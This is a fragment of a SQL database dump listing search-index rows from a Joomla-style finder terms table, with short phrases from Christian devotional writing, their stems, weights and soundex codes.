(278691, 'must be clean', 'must be clean', 0, 1, 1.4333, 'M231245', 1, '*'),
(278692, 'must be to', 'must be to', 0, 1, 1.3333, 'M2313', 1, '*'),
(278693, 'must carry yourself', 'must carry yourself', 0, 1, 1.6333, 'M2326241', 1, '*'),
(278694, 'must consistently', 'must consistently', 0, 1, 1.5667, 'M232523534', 1, '*'),
(278695, 'must consistently be', 'must consistently be', 0, 1, 1.6667, 'M2325235341', 1, '*'),
(278696, 'must reflect', 'must reflect', 0, 1, 1.4, 'M2361423', 1, '*'),
(278697, 'must reflect that', 'must reflect that', 0, 1, 1.5667, 'M2361423', 1, '*'),
(278698, 'must relate', 'must relate', 0, 1, 1.3667, 'M23643', 1, '*'),
(278699, 'must relate with', 'must relate with', 0, 1, 1.5333, 'M23643', 1, '*'),
(278700, 'must renounce', 'must renounce', 0, 1, 1.4333, 'M23652', 1, '*'),
(278701, 'must renounce and', 'must renounce and', 0, 1, 1.5667, 'M2365253', 1, '*'),
(278702, 'must represent', 'must represent', 0, 1, 1.4667, 'M23616253', 1, '*'),
(278703, 'must represent god\'s', 'must represent god', 0, 1, 1.6667, 'M23616253232', 1, '*'),
(278704, 'mustn\'t', 'mustn', 0, 0, 0.4667, 'M2353', 1, '*'),
(278705, 'mustn\'t carry', 'mustn carry', 0, 1, 1.4333, 'M235326', 1, '*'),
(278706, 'mustn\'t carry yourself', 'mustn carry yourself', 0, 1, 1.7333, 'M235326241', 1, '*'),
(278707, 'naked you', 'nake you', 0, 1, 1.3, 'N230', 1, '*'),
(278708, 'naked you must', 'nake you must', 0, 1, 1.4667, 'N23523', 1, '*'),
(278709, 'name as', 'name as', 0, 1, 1.2333, 'N200', 1, '*'),
(278710, 'name as a', 'name as a', 0, 1, 1.3, 'N200', 1, '*'),
(278711, 'nature if', 'natur if', 0, 1, 1.3, 'N361', 1, '*'),
(278712, 'nature if not', 'natur if not', 0, 1, 1.4333, 'N36153', 1, '*'),
(278713, 'need to focus', 'need to focus', 0, 1, 1.4333, 'N312', 1, '*'),
(278714, 'need to please', 'need to please', 0, 1, 1.4667, 'N3142', 1, '*'),
(278715, 'negative or', 'neg or', 0, 1, 1.3667, 'N2316', 1, '*'),
(278716, 'negative or lustful', 'neg or lustful', 0, 1, 1.6333, 'N231642314', 1, '*'),
(278717, 'never noticed', 'never noticed', 0, 1, 1.4333, 'N165323', 1, '*'),
(278718, 'never noticed that', 'never noticed that', 0, 1, 1.6, 'N165323', 1, '*'),
(278719, 'next thing about', 'next thing about', 0, 1, 1.5333, 'N235213', 1, '*'),
(278720, 'next thing you', 'next thing you', 0, 1, 1.4667, 'N2352', 1, '*'),
(278721, 'no heartfelt', 'no heartfelt', 0, 1, 1.4, 'N63143', 1, '*'),
(278722, 'no heartfelt personal', 'no heartfelt personal', 0, 1, 1.7, 'N6314316254', 1, '*'),
(278723, 'no way', 'no way', 0, 1, 1.2, 'N000', 1, '*'),
(278724, 'no way as', 'no way as', 0, 1, 1.3, 'N200', 1, '*'),
(278725, 'not having precedence', 'not having precedence', 0, 1, 1.7, 'N3152162352', 1, '*'),
(278726, 'not into', 'not into', 0, 1, 1.2667, 'N353', 1, '*'),
(278727, 'not into existence', 'not into existence', 0, 1, 1.6, 'N3532352', 1, '*'),
(278728, 'not only applies', 'not only applies', 0, 1, 1.5333, 'N354142', 1, '*'),
(278729, 'not the kind', 'not the kind', 0, 1, 1.4, 'N3253', 1, '*'),
(278730, 'not you still', 'not you still', 0, 1, 1.4333, 'N3234', 1, '*'),
(278731, 'note however', 'note however', 0, 1, 1.4, 'N316', 1, '*'),
(278732, 'note however that', 'note however that', 0, 1, 1.5667, 'N3163', 1, '*'),
(278733, 'nothing to say', 'noth to say', 0, 1, 1.4667, 'N35232', 1, '*'),
(278734, 'noticed', 'notic', 0, 0, 0.4667, 'N323', 1, '*'),
(278735, 'noticed that', 'notic that', 0, 1, 1.4, 'N323', 1, '*'),
(278736, 'noticed that the', 'notic that the', 0, 1, 1.5333, 'N323', 1, '*'),
(278737, 'now behaving', 'now behaving', 0, 1, 1.4, 'N152', 1, '*'),
(278738, 'now behaving in', 'now behaving in', 0, 1, 1.5, 'N1525', 1, '*'),
(278739, 'now that we\'ve', 'now that we', 0, 1, 1.4667, 'N310', 1, '*'),
(278740, 'obey the', 'obei the', 0, 1, 1.2667, 'O130', 1, '*'),
(278741, 'obey the ten', 'obei the ten', 0, 1, 1.4, 'O135', 1, '*'),
(278742, 'obeying a', 'obei a', 0, 1, 1.3, 'O152', 1, '*'),
(278743, 'obeying a set', 'obei a set', 0, 1, 1.4333, 'O1523', 1, '*'),
(278744, 'obsession', 'obsess', 0, 0, 0.6, 'O125', 1, '*'),
(278745, 'obsession with', 'obsess with', 0, 1, 1.4667, 'O1253', 1, '*'),
(278746, 'obsession with man', 'obsess with man', 0, 1, 1.6, 'O12535', 1, '*'),
(278747, 'obvious', 'obviou', 0, 0, 0.4667, 'O120', 1, '*'),
(278748, 'obvious that', 'obviou that', 0, 1, 1.4, 'O123', 1, '*'),
(278749, 'obvious that you', 'obviou that you', 0, 1, 1.5333, 'O123', 1, '*'),
(278750, 'occultic covenants', 'occult covenants', 0, 1, 1.6, 'O24321532', 1, '*'),
(278751, 'occultic covenants especially', 'occult covenants especially', 0, 1, 1.9667, 'O24321532124', 1, '*'),
(278752, 'of a christian', 'of a christian', 0, 1, 1.4667, 'O126235', 1, '*'),
(278753, 'of a personal', 'of a personal', 0, 1, 1.4333, 'O16254', 2, '*'),
(278754, 'of a true', 'of a true', 0, 1, 1.3, 'O136', 1, '*'),
(278755, 'of all men', 'of all men', 0, 1, 1.3333, 'O145', 1, '*'),
(278756, 'of any', 'of any', 0, 1, 1.2, 'O150', 1, '*'),
(278757, 'of any of', 'of any of', 0, 1, 1.3, 'O151', 1, '*'),
(278758, 'of complaining', 'of complaining', 0, 1, 1.4667, 'O1251452', 1, '*'),
(278759, 'of complaining you', 'of complaining you', 0, 1, 1.6, 'O1251452', 1, '*'),
(278760, 'of complex', 'of complex', 0, 1, 1.3333, 'O125142', 1, '*'),
(278761, 'of complex steps', 'of complex steps', 0, 1, 1.5333, 'O125142312', 1, '*'),
(278762, 'of confidence', 'of confidence', 0, 1, 1.4333, 'O1251352', 1, '*'),
(278763, 'of confidence that', 'of confidence that', 0, 1, 1.6, 'O12513523', 1, '*'),
(278764, 'of frustrating', 'of frustrating', 0, 1, 1.4667, 'O16236352', 1, '*'),
(278765, 'of frustrating thoughts', 'of frustrating thoughts', 0, 1, 1.7667, 'O162363523232', 1, '*'),
(278766, 'of him', 'of him', 0, 1, 1.2, 'O150', 1, '*'),
(278767, 'of him you', 'of him you', 0, 1, 1.3333, 'O150', 1, '*'),
(278768, 'of himself', 'of himself', 0, 1, 1.3333, 'O15241', 1, '*'),
(278769, 'of himself more', 'of himself more', 0, 1, 1.5, 'O1524156', 1, '*'),
(278770, 'of inferiority', 'of inferiority', 0, 1, 1.4667, 'O15163', 1, '*'),
(278771, 'of inferiority i', 'of inferiority i', 0, 1, 1.5333, 'O15163', 1, '*'),
(278772, 'of love to', 'of love to', 0, 1, 1.3333, 'O1413', 1, '*'),
(278773, 'of mary', 'of mary', 0, 1, 1.2333, 'O156', 1, '*'),
(278774, 'of mary and', 'of mary and', 0, 1, 1.3667, 'O15653', 1, '*'),
(278775, 'of our mouth', 'of our mouth', 0, 1, 1.4, 'O1653', 1, '*'),
(278776, 'of ourselves because', 'of ourselves because', 0, 1, 1.6667, 'O16241212', 1, '*'),
(278777, 'of realizing', 'of realizing', 0, 1, 1.4, 'O164252', 1, '*'),
(278778, 'of realizing this', 'of realizing this', 0, 1, 1.5667, 'O16425232', 1, '*'),
(278779, 'of religiousness', 'of religiousness', 0, 1, 1.5333, 'O164252', 1, '*'),
(278780, 'of religiousness is', 'of religiousness is', 0, 1, 1.6333, 'O164252', 1, '*'),
(278781, 'of religiousness it', 'of religiousness it', 0, 1, 1.6333, 'O1642523', 1, '*'),
(278782, 'of religiousness matthew', 'of religiousness matthew', 0, 1, 1.8, 'O16425253', 1, '*'),
(278783, 'of rules', 'of rules', 0, 1, 1.2667, 'O1642', 1, '*'),
(278784, 'of rules or', 'of rules or', 0, 1, 1.3667, 'O16426', 1, '*'),
(278785, 'of selfish', 'of selfish', 0, 1, 1.3333, 'O12412', 1, '*'),
(278786, 'of selfish love', 'of selfish love', 0, 1, 1.5, 'O1241241', 1, '*'),
(278787, 'of sex', 'of sex', 0, 1, 1.2, 'O120', 1, '*'),
(278788, 'of sex rather', 'of sex rather', 0, 1, 1.4333, 'O12636', 1, '*'),
(278789, 'of speech', 'of speech', 0, 1, 1.3, 'O1212', 1, '*'),
(278790, 'of speech a', 'of speech a', 0, 1, 1.3667, 'O1212', 1, '*'),
(278791, 'of the christian', 'of the christian', 0, 1, 1.5333, 'O1326235', 1, '*'),
(278792, 'of the easiest', 'of the easiest', 0, 1, 1.4667, 'O1323', 1, '*'),
(278793, 'of the glorious', 'of the glorious', 0, 1, 1.5, 'O132462', 1, '*'),
(278794, 'of the three', 'of the three', 0, 1, 1.4, 'O136', 1, '*'),
(278795, 'of them at', 'of them at', 0, 1, 1.3333, 'O1353', 1, '*'),
(278796, 'of them showed', 'of them showed', 0, 1, 1.4667, 'O13523', 1, '*'),
(278797, 'of them use', 'of them use', 0, 1, 1.3667, 'O1352', 1, '*'),
(278798, 'of this issue', 'of this issue', 0, 1, 1.4333, 'O132', 1, '*'),
(278799, 'of those things', 'of those things', 0, 1, 1.5, 'O132352', 2, '*'),
(278800, 'of work to', 'of work to', 0, 1, 1.3333, 'O1623', 1, '*'),
(278801, 'of your peers', 'of your peers', 0, 1, 1.4333, 'O16162', 1, '*'),
(278802, 'of yourself.”', 'of yourself.”', 0, 1, 1.4333, 'O16241', 1, '*'),
(278803, 'of yourself.” it', 'of yourself.” it', 0, 1, 1.5333, 'O162413', 1, '*'),
(278804, 'on a regular', 'on a regular', 0, 1, 1.4, 'O56246', 1, '*'),
(278805, 'on the lifestyle', 'on the lifestyle', 0, 1, 1.5333, 'O5341234', 1, '*'),
(278806, 'on your best', 'on your best', 0, 1, 1.4, 'O56123', 1, '*'),
(278807, 'once don\'t', 'onc don', 0, 1, 1.3333, 'O52353', 1, '*'),
(278808, 'once don\'t give', 'onc don give', 0, 1, 1.5, 'O5235321', 1, '*'),
(278809, 'only applies', 'onli applies', 0, 1, 1.4, 'O54142', 1, '*'),
(278810, 'only applies to', 'onli applies to', 0, 1, 1.5, 'O541423', 1, '*'),
(278811, 'only begotten', 'onli begotten', 0, 1, 1.4333, 'O541235', 1, '*'),
(278812, 'only begotten son', 'onli begotten son', 0, 1, 1.5667, 'O54123525', 1, '*'),
(278813, 'opportunity to hear', 'opportun to hear', 0, 1, 1.6333, 'O163536', 1, '*'),
(278814, 'or complain', 'or complain', 0, 1, 1.3667, 'O625145', 1, '*'),
(278815, 'or complain and', 'or complain and', 0, 1, 1.5, 'O6251453', 1, '*'),
(278816, 'or lustful', 'or lustful', 0, 1, 1.3333, 'O642314', 1, '*'),
(278817, 'or lustful thoughts', 'or lustful thoughts', 0, 1, 1.6333, 'O6423143232', 1, '*'),
(278818, 'or trying', 'or trying', 0, 1, 1.3, 'O63652', 1, '*'),
(278819, 'or trying to', 'or trying to', 0, 1, 1.4, 'O636523', 1, '*'),
(278820, 'or unfavorable', 'or unfavorable', 0, 1, 1.4667, 'O651614', 1, '*'),
(278821, 'or unfavorable situation', 'or unfavorable situation', 0, 1, 1.8, 'O651614235', 1, '*'),
(278822, 'or your life', 'or your life', 0, 1, 1.4, 'O641', 1, '*'),
(278823, 'other moral', 'other moral', 0, 1, 1.3667, 'O36564', 1, '*'),
(278824, 'other moral rules', 'other moral rules', 0, 1, 1.5667, 'O36564642', 1, '*'),
(278825, 'others with', 'other with', 0, 1, 1.3667, 'O3623', 1, '*'),
(278826, 'others with love', 'other with love', 0, 1, 1.5333, 'O362341', 1, '*'),
(278827, 'ought', 'ought', 0, 0, 0.3333, 'O230', 1, '*'),
(278828, 'ought to', 'ought to', 0, 1, 1.2667, 'O230', 1, '*'),
(278829, 'ought to think', 'ought to think', 0, 1, 1.4667, 'O2352', 1, '*'),
(278830, 'ought to wow', 'ought to wow', 0, 1, 1.4, 'O230', 1, '*'),
(278831, 'our christianity', 'our christianity', 0, 1, 1.5333, 'O6262353', 1, '*'),
(278832, 'our christianity to', 'our christianity to', 0, 1, 1.6333, 'O6262353', 1, '*'),
(278833, 'our mouth', 'our mouth', 0, 1, 1.3, 'O653', 1, '*'),
(278834, 'our mouth what', 'our mouth what', 0, 1, 1.4667, 'O653', 1, '*'),
(278835, 'ourselves because', 'ourselv because', 0, 1, 1.5667, 'O6241212', 1, '*'),
(278836, 'ourselves because god', 'ourselv because god', 0, 1, 1.7, 'O62412123', 1, '*'),
(278837, 'out of their', 'out of their', 0, 1, 1.4, 'O3136', 1, '*'),
(278838, 'outcome of', 'outcom of', 0, 1, 1.3333, 'O3251', 1, '*'),
(278839, 'outcome of your', 'outcom of your', 0, 1, 1.5, 'O32516', 1, '*'),
(278840, 'outflow', 'outflow', 0, 0, 0.4667, 'O314', 1, '*'),
(278841, 'outflow of', 'outflow of', 0, 1, 1.3333, 'O3141', 1, '*'),
(278842, 'outflow of your', 'outflow of your', 0, 1, 1.5, 'O31416', 1, '*'),
(278843, 'overcome as', 'overcom as', 0, 1, 1.3667, 'O16252', 1, '*'),
(278844, 'overcome as a', 'overcom as a', 0, 1, 1.4333, 'O16252', 1, '*'),
(278845, 'own freewill', 'own freewill', 0, 1, 1.4, 'O5164', 1, '*'),
(278846, 'own freewill the', 'own freewill the', 0, 1, 1.5333, 'O51643', 1, '*'),
(278847, 'part 3', 'part 3', 0, 1, 1.2, 'P630', 1, '*'),
(278848, 'pays to', 'pai to', 0, 1, 1.2333, 'P230', 1, '*'),
(278849, 'pays to serve', 'pai to serve', 0, 1, 1.4333, 'P23261', 1, '*'),
(278850, 'peers', 'peer', 0, 0, 0.3333, 'P620', 1, '*'),
(278851, 'peers and', 'peer and', 0, 1, 1.3, 'P6253', 1, '*'),
(278852, 'peers and people', 'peer and people', 0, 1, 1.5333, 'P625314', 1, '*'),
(278853, 'people god wants', 'peopl god wants', 0, 1, 1.5333, 'P423532', 1, '*'),
(278854, 'people in love', 'peopl in love', 0, 1, 1.4667, 'P4541', 1, '*'),
(278855, 'people tell', 'peopl tell', 0, 1, 1.3667, 'P434', 1, '*'),
(278856, 'people tell themselves', 'peopl tell themselves', 0, 1, 1.7333, 'P434352412', 1, '*'),
(278857, 'people use', 'peopl use', 0, 1, 1.3333, 'P420', 1, '*'),
(278858, 'people use c', 'peopl use c', 0, 1, 1.4, 'P420', 1, '*'),
(278859, 'people who would', 'peopl who would', 0, 1, 1.5333, 'P430', 1, '*'),
(278860, 'person that\'s', 'person that', 0, 1, 1.4333, 'P62532', 1, '*'),
(278861, 'person that\'s another', 'person that another', 0, 1, 1.7, 'P62532536', 1, '*'),
(278862, 'personal fellowship', 'person fellowship', 0, 1, 1.6333, 'P62541421', 1, '*'),
(278863, 'personal fellowship with', 'person fellowship with', 0, 1, 1.8, 'P625414213', 1, '*'),
(278864, 'personal relationship and', 'person relationship and', 0, 1, 1.8333, 'P625464352153', 1, '*'),
(278865, 'personal walk', 'person walk', 0, 1, 1.4333, 'P62542', 1, '*'),
(278866, 'personal walk with', 'person walk with', 0, 1, 1.6, 'P625423', 1, '*'),
(278867, 'pharisees several', 'pharise several', 0, 1, 1.5667, 'P62164', 1, '*'),
(278868, 'pharisees several times', 'pharise several times', 0, 1, 1.7667, 'P62164352', 1, '*'),
(278869, 'philippians', 'philippian', 0, 0, 0.7333, 'P4152', 1, '*'),
(278870, 'philippians 4', 'philippian 4', 0, 1, 1.4333, 'P4152', 1, '*'),
(278871, 'philippians 4 8-9', 'philippian 4 8-9', 0, 1, 1.5667, 'P4152', 1, '*'),
(278872, 'physical life isn\'t', 'physic life isn', 0, 1, 1.6333, 'P241253', 1, '*'),
(278873, 'please god', 'pleas god', 0, 1, 1.3333, 'P423', 1, '*'),
(278874, 'please god and', 'pleas god and', 0, 1, 1.4667, 'P42353', 1, '*'),
(278875, 'pleasing god they', 'pleas god they', 0, 1, 1.5667, 'P42523', 1, '*'),
(278876, 'point at', 'point at', 0, 1, 1.2667, 'P530', 1, '*'),
(278877, 'point at which', 'point at which', 0, 1, 1.4667, 'P532', 1, '*'),
(278878, 'point because', 'point because', 0, 1, 1.4333, 'P5312', 1, '*'),
(278879, 'point because god\'s', 'point because god', 0, 1, 1.6333, 'P531232', 1, '*'),
(278880, 'poses', 'pose', 0, 0, 0.3333, 'P200', 1, '*'),
(278881, 'poses to', 'pose to', 0, 1, 1.2667, 'P230', 1, '*'),
(278882, 'poses to him', 'pose to him', 0, 1, 1.4, 'P235', 1, '*'),
(278883, 'possession', 'possess', 0, 0, 0.6667, 'P250', 2, '*'),
(278884, 'possession everything', 'possess everything', 0, 1, 1.7, 'P2516352', 1, '*'),
(278885, 'possession everything you', 'possess everything you', 0, 1, 1.8333, 'P2516352', 1, '*'),
(278886, 'possible in', 'possibl in', 0, 1, 1.3667, 'P2145', 1, '*'),
(278887, 'possible in front', 'possibl in front', 0, 1, 1.5667, 'P21451653', 1, '*'),
(278888, 'power is', 'power is', 0, 1, 1.2667, 'P620', 1, '*'),
(278889, 'power is in', 'power is in', 0, 1, 1.3667, 'P625', 1, '*'),
(278890, 'power to', 'power to', 0, 1, 1.2667, 'P630', 1, '*'),
(278891, 'power to stop', 'power to stop', 0, 1, 1.4333, 'P63231', 1, '*'),
(278892, 'powerful point', 'power point', 0, 1, 1.4667, 'P614153', 1, '*'),
(278893, 'powerful point because', 'power point because', 0, 1, 1.7333, 'P61415312', 1, '*'),
(278894, 'practice religion', 'practic religion', 0, 1, 1.5667, 'P62326425', 1, '*'),
(278895, 'practice religion at', 'practic religion at', 0, 1, 1.6667, 'P623264253', 1, '*'),
(278896, 'practices that', 'practic that', 0, 1, 1.4667, 'P62323', 1, '*'),
(278897, 'practices that are', 'practic that are', 0, 1, 1.6, 'P623236', 1, '*'),
(278898, 'pray in a', 'prai in a', 0, 1, 1.3, 'P650', 1, '*'),
(278899, 'precedence', 'preced', 0, 0, 0.6667, 'P62352', 1, '*'),
(278900, 'precedence in', 'preced in', 0, 1, 1.4333, 'P623525', 1, '*'),
(278901, 'precedence in the', 'preced in the', 0, 1, 1.5667, 'P6235253', 1, '*'),
(278902, 'pretty', 'pretti', 0, 0, 0.4, 'P630', 1, '*'),
(278903, 'pretty obvious', 'pretti obvious', 0, 1, 1.4667, 'P6312', 1, '*'),
(278904, 'pretty obvious that', 'pretti obvious that', 0, 1, 1.6333, 'P63123', 1, '*'),
(278905, 'pride because', 'pride because', 0, 1, 1.4333, 'P6312', 1, '*'),
(278906, 'pride because god', 'pride because god', 0, 1, 1.5667, 'P63123', 1, '*'),
(278907, 'primary focus', 'primari focus', 0, 1, 1.4333, 'P65612', 1, '*'),
(278908, 'primary focus it', 'primari focus it', 0, 1, 1.5333, 'P656123', 1, '*'),
(278909, 'prioritized', 'priorit', 0, 0, 0.7333, 'P6323', 1, '*'),
(278910, 'prioritized her', 'priorit her', 0, 1, 1.5, 'P63236', 1, '*'),
(278911, 'prioritized her personal', 'priorit her personal', 0, 1, 1.8, 'P6323616254', 1, '*'),
(278912, 'privilege to', 'privileg to', 0, 1, 1.4, 'P61423', 1, '*'),
(278913, 'privilege to be', 'privileg to be', 0, 1, 1.5, 'P614231', 1, '*'),
(278914, 'probably', 'probabl', 0, 0, 0.5333, 'P614', 1, '*'),
(278915, 'probably didn\'t', 'probabl didn', 0, 1, 1.5, 'P614353', 1, '*'),
(278916, 'probably didn\'t know', 'probabl didn know', 0, 1, 1.6667, 'P61435325', 1, '*'),
(278917, 'probably never', 'probabl never', 0, 1, 1.4667, 'P614516', 1, '*'),
(278918, 'probably never noticed', 'probabl never noticed', 0, 1, 1.7333, 'P6145165323', 1, '*'),
(278919, 'profitable', 'profit', 0, 0, 0.6667, 'P61314', 1, '*'),
(278920, 'profitable if', 'profit if', 0, 1, 1.4333, 'P613141', 1, '*'),
(278921, 'profitable if you\'re', 'profit if you', 0, 1, 1.6667, 'P6131416', 1, '*'),
(278922, 'prospering', 'prosper', 0, 0, 0.6667, 'P621652', 1, '*'),
(278923, 'prospering the', 'prosper the', 0, 1, 1.4667, 'P6216523', 1, '*'),
(278924, 'prospering the kingdom', 'prosper the kingdom', 0, 1, 1.7333, 'P621652325235', 1, '*'),
(278925, 'proud', 'proud', 0, 0, 0.3333, 'P630', 1, '*'),
(278926, 'proud also', 'proud also', 0, 1, 1.3333, 'P6342', 1, '*'),
(278927, 'proud also you', 'proud also you', 0, 1, 1.4667, 'P6342', 1, '*'),
(278928, 'proverbs 23 7', 'proverb 23 7', 0, 1, 1.4333, 'P61612', 1, '*'),
(278929, 'psalm 8', 'psalm 8', 0, 1, 1.2333, 'P245', 1, '*'),
(278930, 'psalm 8 3-6', 'psalm 8 3-6', 0, 1, 1.3667, 'P245', 1, '*'),
(278931, 'putting on', 'put on', 0, 1, 1.3333, 'P3525', 1, '*'),
(278932, 'putting on your', 'put on your', 0, 1, 1.5, 'P35256', 1, '*'),
(278933, 'quarter three-quarter', 'quarter three-quarter', 0, 1, 1.7, 'Q636362636', 1, '*'),
(278934, 'quarter three-quarter naked', 'quarter three-quarter naked', 0, 1, 1.9, 'Q636362636523', 1, '*'),
(278935, 'rather a', 'rather a', 0, 1, 1.2667, 'R360', 1, '*'),
(278936, 'rather a selfless', 'rather a selfless', 0, 1, 1.5667, 'R3624142', 1, '*'),
(278937, 'rather than', 'rather than', 0, 1, 1.3667, 'R3635', 1, '*'),
(278938, 'rather than seeing', 'rather than seeing', 0, 1, 1.6, 'R3635252', 1, '*'),
(278939, 'ready for jesus', 'readi for jesus', 0, 1, 1.5, 'R3162', 1, '*'),
(278940, 'realize that all', 'realiz that all', 0, 1, 1.5333, 'R4234', 1, '*'),
(278941, 'realizing', 'realiz', 0, 0, 0.6, 'R4252', 1, '*'),
(278942, 'realizing this', 'realiz this', 0, 1, 1.4667, 'R425232', 1, '*'),
(278943, 'realizing this religious', 'realiz this religious', 0, 1, 1.8, 'R425232642', 1, '*'),
(278944, 'really takes', 'realli takes', 0, 1, 1.4, 'R432', 1, '*'),
(278945, 'really takes is', 'realli takes is', 0, 1, 1.5, 'R432', 1, '*'),
(278946, 'reason was', 'reason was', 0, 1, 1.3333, 'R252', 1, '*'),
(278947, 'reason was to', 'reason was to', 0, 1, 1.4333, 'R2523', 1, '*'),
(278948, 'rebuked the', 'rebuk the', 0, 1, 1.3667, 'R123', 1, '*'),
(278949, 'rebuked the pharisees', 'rebuk the pharisees', 0, 1, 1.7, 'R123162', 1, '*'),
(278950, 'reflect god\'s', 'reflect god', 0, 1, 1.4333, 'R1423232', 1, '*'),
(278951, 'reflect god\'s nature', 'reflect god nature', 0, 1, 1.6667, 'R1423232536', 1, '*'),
(278952, 'reflect that', 'reflect that', 0, 1, 1.4, 'R1423', 1, '*'),
(278953, 'reflect that by', 'reflect that by', 0, 1, 1.5, 'R14231', 1, '*'),
(278954, 'reflection', 'reflect', 0, 0, 0.6667, 'R14235', 1, '*'),
(278955, 'reflection of', 'reflect of', 0, 1, 1.4333, 'R142351', 1, '*'),
(278956, 'reflection of him', 'reflect of him', 0, 1, 1.5667, 'R1423515', 1, '*'),
(278957, 'regular basis', 'regular basis', 0, 1, 1.4333, 'R24612', 1, '*'),
(278958, 'regular basis obey', 'regular basis obey', 0, 1, 1.6, 'R246121', 1, '*'),
(278959, 'relate with people', 'relat with people', 0, 1, 1.6, 'R4314', 1, '*'),
(278960, 'relationship and', 'relationship and', 0, 1, 1.5333, 'R4352153', 1, '*'),
(278961, 'relationship and according', 'relationship and according', 0, 1, 1.8667, 'R435215326352', 1, '*'),
(278962, 'relationship with christ', 'relationship with christ', 0, 1, 1.8, 'R4352132623', 1, '*'),
(278963, 'religion', 'religion', 0, 0, 0.5333, 'R425', 2, '*'),
(278964, 'religion at', 'religion at', 0, 1, 1.3667, 'R4253', 1, '*'),
(278965, 'religion at the', 'religion at the', 0, 1, 1.5, 'R4253', 1, '*'),
(278966, 'religion with', 'religion with', 0, 1, 1.4333, 'R4253', 1, '*'),
(278967, 'religion with no', 'religion with no', 0, 1, 1.5333, 'R42535', 1, '*'),
(278968, 'religious christian', 'religi christian', 0, 1, 1.6333, 'R426235', 1, '*'),
(278969, 'religious christian while', 'religi christian while', 0, 1, 1.8333, 'R4262354', 1, '*'),
(278970, 'religious hypocrites', 'religi hypocrites', 0, 1, 1.6667, 'R4212632', 1, '*'),
(278971, 'religious hypocrites god', 'religi hypocrites god', 0, 1, 1.8, 'R42126323', 1, '*'),
(278972, 'religious people', 'religi people', 0, 1, 1.5333, 'R4214', 1, '*'),
(278973, 'religious people tell', 'religi people tell', 0, 1, 1.7, 'R421434', 1, '*'),
(278974, 'religiousness', 'religi', 0, 0, 0.8667, 'R4252', 1, '*'),
(278975, 'religiousness is', 'religi is', 0, 1, 1.5333, 'R4252', 1, '*'),
(278976, 'religiousness is that', 'religi is that', 0, 1, 1.7, 'R42523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(278977, 'religiousness it', 'religi it', 0, 1, 1.5333, 'R42523', 1, '*'),
(278978, 'religiousness it robs', 'religi it robs', 0, 1, 1.7, 'R42523612', 1, '*'),
(278979, 'religiousness matthew', 'religi matthew', 0, 1, 1.7, 'R425253', 1, '*'),
(278980, 'religiousness matthew 15', 'religi matthew 15', 0, 1, 1.8, 'R425253', 1, '*'),
(278981, 'renounce', 'renounc', 0, 0, 0.5333, 'R520', 1, '*'),
(278982, 'renounce and', 'renounc and', 0, 1, 1.4, 'R5253', 1, '*'),
(278983, 'renounce and repent', 'renounc and repent', 0, 1, 1.6333, 'R52536153', 1, '*'),
(278984, 'repent of them', 'repent of them', 0, 1, 1.4667, 'R153135', 1, '*'),
(278985, 'represent god', 'repres god', 0, 1, 1.4333, 'R1625323', 1, '*'),
(278986, 'represent god in', 'repres god in', 0, 1, 1.5333, 'R16253235', 1, '*'),
(278987, 'represents', 'repres', 0, 0, 0.6667, 'R162532', 1, '*'),
(278988, 'represents the', 'repres the', 0, 1, 1.4667, 'R1625323', 1, '*'),
(278989, 'represents the religious', 'repres the religious', 0, 1, 1.8, 'R1625323642', 1, '*'),
(278990, 'resist', 'resist', 0, 0, 0.4, 'R230', 1, '*'),
(278991, 'resist the', 'resist the', 0, 1, 1.3333, 'R230', 1, '*'),
(278992, 'resist the devil', 'resist the devil', 0, 1, 1.5333, 'R2314', 1, '*'),
(278993, 'resists', 'resist', 0, 0, 0.4667, 'R232', 1, '*'),
(278994, 'resists the', 'resist the', 0, 1, 1.3667, 'R2323', 1, '*'),
(278995, 'resists the proud', 'resist the proud', 0, 1, 1.5667, 'R2323163', 1, '*'),
(278996, 'respect and a', 'respect and a', 0, 1, 1.4333, 'R212353', 1, '*'),
(278997, 'respect god', 'respect god', 0, 1, 1.3667, 'R212323', 1, '*'),
(278998, 'respect god is', 'respect god is', 0, 1, 1.4667, 'R2123232', 1, '*'),
(278999, 'right way', 'right way', 0, 1, 1.3, 'R230', 1, '*'),
(279000, 'right way he\'ll', 'right way he', 0, 1, 1.5, 'R234', 1, '*'),
(279001, 'robs you', 'rob you', 0, 1, 1.2667, 'R120', 1, '*'),
(279002, 'robs you of', 'rob you of', 0, 1, 1.3667, 'R121', 1, '*'),
(279003, 'role of', 'role of', 0, 1, 1.2333, 'R410', 1, '*'),
(279004, 'role of the', 'role of the', 0, 1, 1.3667, 'R413', 1, '*'),
(279005, 'romans 12 3', 'roman 12 3', 0, 1, 1.3667, 'R520', 1, '*'),
(279006, 'rough', 'rough', 0, 0, 0.3333, 'R200', 1, '*'),
(279007, 'rough dirty', 'rough dirty', 0, 1, 1.3667, 'R2363', 1, '*'),
(279008, 'rough dirty semi', 'rough dirty semi', 0, 1, 1.5333, 'R236325', 1, '*'),
(279009, 'rough unkempt', 'rough unkempt', 0, 1, 1.4333, 'R252513', 1, '*'),
(279010, 'rough unkempt and', 'rough unkempt and', 0, 1, 1.5667, 'R25251353', 1, '*'),
(279011, 'rules', 'rule', 0, 0, 0.3333, 'R420', 1, '*'),
(279012, 'rules and', 'rule and', 0, 1, 1.3, 'R4253', 1, '*'),
(279013, 'rules and pray', 'rule and pray', 0, 1, 1.4667, 'R425316', 1, '*'),
(279014, 'rules or', 'rule or', 0, 1, 1.2667, 'R426', 1, '*'),
(279015, 'rules or trying', 'rule or trying', 0, 1, 1.5, 'R4263652', 1, '*'),
(279016, 'say eat', 'sai eat', 0, 1, 1.2333, 'S300', 1, '*'),
(279017, 'say eat and', 'sai eat and', 0, 1, 1.3667, 'S353', 1, '*'),
(279018, 'say start', 'sai start', 0, 1, 1.3, 'S363', 1, '*'),
(279019, 'say start speaking', 'sai start speaking', 0, 1, 1.6, 'S36321252', 1, '*'),
(279020, 'say will', 'sai will', 0, 1, 1.2667, 'S400', 1, '*'),
(279021, 'say will happen', 'sai will happen', 0, 1, 1.5, 'S415', 1, '*'),
(279022, 'say “don\'t', 'sai “don', 0, 1, 1.3333, 'S353', 1, '*'),
(279023, 'say “don\'t think', 'sai “don think', 0, 1, 1.5333, 'S35352', 1, '*'),
(279024, 'says don\'t', 'sai don', 0, 1, 1.3333, 'S353', 1, '*'),
(279025, 'says don\'t think', 'sai don think', 0, 1, 1.5333, 'S35352', 1, '*'),
(279026, 'scripture above those', 'scriptur above those', 0, 1, 1.7, 'S6136132', 1, '*'),
